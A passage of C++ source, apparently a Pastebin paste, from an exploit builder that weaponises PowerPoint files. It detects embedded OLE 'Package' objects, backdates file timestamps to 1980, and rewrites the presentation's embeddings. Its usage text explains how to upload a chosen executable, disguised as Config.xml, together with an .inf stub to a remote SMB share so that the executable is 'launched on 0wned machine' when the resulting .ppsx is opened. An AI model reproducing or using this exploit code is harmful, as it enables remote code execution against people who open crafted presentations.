  827.  
  828. *doesHave = false;
  829.  
  830. /* Get pointer to interface of Slides object.
  831. */
  832. CHK_HR(pPresentation ->get_Slides(&pSlides) );
  833.  
  834.  
  835. /* Get count of slides in presentation
  836. */
  837. CHK_HR(pSlides ->get_Count(&slidesCount) );
  838.  
  839. /* Make sure that slides exist in presentation
  840. */
  841. if (slidesCount == 0) {
  842.  
  843. printf("[-] Failed couse no slides found in presentation\n");
  844.  
  845. CHK_HR(E_FAIL);
  846. }
  847.  
  848. for (long i = 1; i <= slidesCount; i ++) {
  849.  
  850. VariantInitAsLong(varSlideIndex, i);
  851.  
  852. CHK_HR( pSlides ->raw_Item( varSlideIndex, &pSlide) );
  853.  
  854. VariantClear( &varSlideIndex );
  855.  
  856. /* Get list of shapes
  857. */
  858. CHK_HR( pSlide ->get_Shapes( &pShapes) );
  859.  
  860. /* Get count of shapes
  861. */
  862. CHK_HR( pShapes ->get_Count(&shapesCount) );
  863.  
  864. /* Verify each shape
  865. */
  866. for (int j = 1; j <= shapesCount; j++) {
  867.  
  868. VariantInitAsLong( varShapeIndex, j);
  869.  
  870. CHK_HR( pShapes ->raw_Item( varShapeIndex, &pShape) );
  871.  
  872. VariantClear( &varShapeIndex );
  873.  
  874. CHK_HR( pShape ->get_AutoShapeType( &shapeType) );
  875.  
  876. if (shapeType == Office::MsoAutoShapeType::msoShapeMixed) {
  877.  
  878. CHK_HR( pShape ->get_OLEFormat(&pOLEFormat) );
  879.  
  880. CHK_HR( pOLEFormat ->get_ProgID( &bstrProgId) );
  881.  
  882. if (wcsicmp( L"Package", bstrProgId) == 0) {
  883.  
  884. *doesHave = true;
  885. }
  886.  
  887. SAFE_FREE_BSTR_BY_REF( &bstrProgId );
  888.  
  889. SAFE_RELEASE_BY_REF( &pOLEFormat );
  890. }
  891.  
  892. SAFE_RELEASE_BY_REF( &pShape );
  893.  
  894. if (*doesHave) {
  895.  
  896. break;
  897. }
  898. }
  899. ///////////
  900.  
  901.  
  902. SAFE_RELEASE_BY_REF( &pShapes );
  903.  
  904. SAFE_RELEASE_BY_REF( &pSlide );
  905.  
  906. if (*doesHave) {
  907.  
  908. break;
  909. }
  910. }
  911.  
  912. bres = true;
  913.  
  914. _Done:
  915.  
  916. VariantClear( &varShapeIndex );
  917.  
  918. VariantClear( &varSlideIndex );
  919.  
  920. SAFE_FREE_BSTR_BY_REF( &bstrProgId );
  921.  
  922. SAFE_RELEASE_BY_REF( &pOLEFormat );
  923.  
  924. SAFE_RELEASE_BY_REF( &pShape );
  925.  
  926. SAFE_RELEASE_BY_REF( &pShapes );
  927.  
  928. SAFE_RELEASE_BY_REF( &pSlide );
  929.  
  930. SAFE_RELEASE_BY_REF( &pSlides );
  931.  
  932. return bres;
  933. }
  934.  
  935. bool change_file_time(wchar_t *fname) {
  936.  
  937. SYSTEMTIME systemTime = {0};
  938. HANDLE hFile = INVALID_HANDLE_VALUE;
  939. FILETIME fileTime = {0};
  940.  
  941. GetSystemTime( &systemTime);
  942.  
  943. systemTime.wYear = 1980;
  944. systemTime.wMonth = 1;
  945. systemTime.wDay = 1;
  946. systemTime.wHour = 15;
  947. systemTime.wMinute = 0;
  948. systemTime.wSecond = 0;
  949.  
  950. hFile = \
  951. CreateFileW(
  952. fname,
  953. FILE_WRITE_ATTRIBUTES,
  954. FILE_SHARE_READ | FILE_SHARE_WRITE,
  955. NULL,
  956. OPEN_EXISTING,
  957. FILE_ATTRIBUTE_NORMAL,
  958. NULL
  959. );
  960.  
  961. if (hFile == NULL || hFile == INVALID_HANDLE_VALUE) {
  962.  
  963. return false;
  964. }
  965.  
  966. SystemTimeToFileTime( &systemTime, &fileTime);
  967.  
  968. SetFileTime( hFile, &fileTime, &fileTime, &fileTime);
  969.  
  970. CloseHandle(hFile);
  971.  
  972. return true;
  973. }
  974.  
  975. bool rewrite_embeddings_in_presentation(__in wchar_t *fnameZip, __in wchar_t *fnameData)
  976. /*++
  977. Oh fuck! Stupid Microsoft developers cann't create human-relible
  978. API for zip management. 21st century! WTF? I cann't use IShell
  979. interface for zip management, so use 3rd party zip archivers.
  980. --*/
  981. {
  982.  
  983. bool bres = false;
  984. IShellDispatch *pShell = NULL;
  985. VARIANT varDir,
  986. varFile,
  987. varOption;
  988. Folder *pFolder = NULL;
  989. wstring stdWstrDir;
  990.  
  991.  
  992. VariantInit(&varDir);
  993. VariantInit(&varFile);
  994. VariantInit(&varOption);
  995.  
  996. stdWstrDir.append(fnameZip);
  997. stdWstrDir.append(L"\\ppt\\embeddings");
  998.  
  999. CHK_HR( CoCreateInstance( CLSID_Shell, NULL, CLSCTX_INPROC_SERVER, IID_IShellDispatch, (LPVOID*)&pShell) );
  1000.  
  1001.  
  1002. varDir.vt = VT_BSTR;
  1003. varDir.bstrVal = _bstr_t(stdWstrDir.c_str());
  1004.  
  1005. CHK_HR( pShell ->NameSpace(varDir, &pFolder) );
  1006.  
  1007. varFile.vt = VT_BSTR;
  1008. varFile.bstrVal = _bstr_t(fnameData);
  1009.  
  1010. varOption.vt = VT_I4;
  1011. varOption.lVal = FOF_NO_UI;
  1012.  
  1013. CHK_HR( pFolder ->CopyHere( varFile, varOption) );
  1014.  
  1015. Sleep( 1000 );
  1016.  
  1017. bres = true;
  1018.  
  1019.  
  1020. _Done:
  1021.  
  1022. //VariantClear( &varOption );
  1023. //VariantClear( &varFile );
  1024. //VariantClear( &varDir );
  1025.  
  1026. SAFE_RELEASE_BY_REF( &pFolder );
  1027.  
  1028. SAFE_RELEASE_BY_REF( &pShell );
  1029.  
  1030. return bres;
  1031. }
  1032.  
  1033. bool parse_cmd(
  1034. __in int argc,
  1035. wchar_t **argv,
  1036. wstring *fnamePptIn,
  1037. wstring *smbPath,
  1038. wstring *fnameExe,
  1039. wstring *fnameExeOnSmb,
  1040. wstring *fnameInfOnSmb,
  1041. bool *bForceUpload
  1042. )
  1043. {
  1044. wstring stdOpt;
  1045. bool bFnamePptIn = false,
  1046. bSmbPath = false,
  1047. bFnameExe = false,
  1048. bFnameExeOnSmb = false,
  1049. bFnameInfOnSmb = false;
  1050.  
  1051.  
  1052. if (argc < 11) {
  1053.  
  1054. print_usage_and_exit(argv[0]);
  1055.  
  1056. return false;
  1057. }
  1058.  
  1059. for (int i = 1; i < argc; i++) {
  1060.  
  1061. stdOpt.clear();
  1062.  
  1063. stdOpt.append(argv[i]);
  1064.  
  1065. if (stdOpt.compare(L"--force-upload") == 0) {
  1066.  
  1067. *bForceUpload = true;
  1068.  
  1069. continue;
  1070. }
  1071.  
  1072. if ((i+1) >= argc) {
  1073.  
  1074. printf("[-] ERROR: malformed input\n");
  1075.  
  1076. return false;
  1077. }
  1078.  
  1079. if ( stdOpt.compare(L"-p") == 0 ) {
  1080.  
  1081. fnamePptIn ->clear();
  1082.  
  1083. fnamePptIn ->append( argv[i+1]);
  1084.  
  1085. i+=1;
  1086.  
  1087. bFnamePptIn = true;
  1088.  
  1089. continue;
  1090. }
  1091.  
  1092. if ( stdOpt.compare(L"-smb") == 0 ) {
  1093.  
  1094. smbPath ->clear();
  1095.  
  1096. smbPath ->append( argv[i+1]);
  1097.  
  1098. i+=1;
  1099.  
  1100. bSmbPath = true;
  1101.  
  1102. continue;
  1103. }
  1104.  
  1105. if ( stdOpt.compare(L"-ef") == 0 ) {
  1106.  
  1107. fnameExe ->clear();
  1108.  
  1109. fnameExe ->append( argv[i+1]);
  1110.  
  1111. i+=1;
  1112.  
  1113. bFnameExe = true;
  1114.  
  1115. continue;
  1116. }
  1117.  
  1118. if ( stdOpt.compare(L"-eof") == 0 ) {
  1119.  
  1120. fnameExeOnSmb ->clear();
  1121.  
  1122. fnameExeOnSmb ->append( argv[i+1]);
  1123.  
  1124. i+=1;
  1125.  
  1126. bFnameExeOnSmb = true;
  1127.  
  1128. continue;
  1129. }
  1130.  
  1131. if ( stdOpt.compare(L"-iof") == 0 ) {
  1132.  
  1133. fnameInfOnSmb ->clear();
  1134.  
  1135. fnameInfOnSmb ->append( argv[i+1]);
  1136.  
  1137. i+=1;
  1138.  
  1139. bFnameInfOnSmb = true;
  1140.  
  1141. continue;
  1142. }
  1143. }
  1144.  
  1145. if (!bFnamePptIn || !bSmbPath || !bFnameExe || !bFnameExeOnSmb || !bFnameInfOnSmb) {
  1146.  
  1147. printf("[-] ERROR: Not all options specified\n");
  1148.  
  1149. return false;
  1150. }
  1151.  
  1152. return true;
  1153. }
  1154.  
  1155. void print_usage_and_exit(wchar_t *exe) {
  1156.  
  1157. wprintf(
  1158. L" **************************************************************** \n"
  1159. L"[?] Usage: %s [option|[option]...] \n"
  1160. L" **************************************************************** \n"
  1161. L" options: \n"
  1162. L" -p - path to input PowerPoint presentation file; \n"
  1163. L" -smb - UNC path on remote server in which files should be \n"
  1164. L" placed, f.e: \\\\192.168.3.100\\public ; \n"
  1165. L" -ef - path to executable file to be launched on 0wned \n"
  1166. L" machine; content of file 'll be stored into -eof \n"
  1167. L" file; \n"
  1168. L" -eof - name of file into which -ef file's content to be \n"
  1169. L" stored; exploit uploads this file onto -smb path \n"
  1170. L" automatically; make sure that -eof file is located \n"
  1171. L" on remote server before exploitation phase; \n"
  1172. L" -iof - name of .inf file to be stored on remote server; \n"
  1173. L" exploit extracts .inf stub from self and stores into \n"
  1174. L" file on remote host automatically; make sure that \n"
  1175. L" this file exists on remote server before exploitation \n"
  1176. L" phase; \n"
  1177. L" --force-upload \n"
  1178. L" - specifies explicit file's uploading to remote server; \n"
  1179. L" **************************************************************** \n"
  1180. L" EXAMPLE: \n"
  1181. L" -p a.pptx -smb \\\\192.168.0.1\\public -ef E:\\stub.exe \\ \n"
  1182. L" -eof Config.xml -iof Preview.inf --force-upload \n"
  1183. L" creates a.pptx.saved.ppsx file from a.pptx; \n"
  1184. L" stores stub.exe into \\\\192.168.0.1\\public\\Config.xml; \n"
  1185. L" stores .inf stub into \\\\192.168.0.1\\public\\Preview.inf; \n"
  1186. L" **************************************************************** \n"
  1187. L" NOTES: \n"
  1188. L" -smb, -iof, -eof are written into presentations, so make sure \n"
  1189. " that specified things exist in real life; \n"
  1190. L" **************************************************************** \n",
  1191. exe);
  1192.  
  1193. ExitProcess(0);
  1194. }
  1195.  
  1196. /* EOF
  1197. */
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!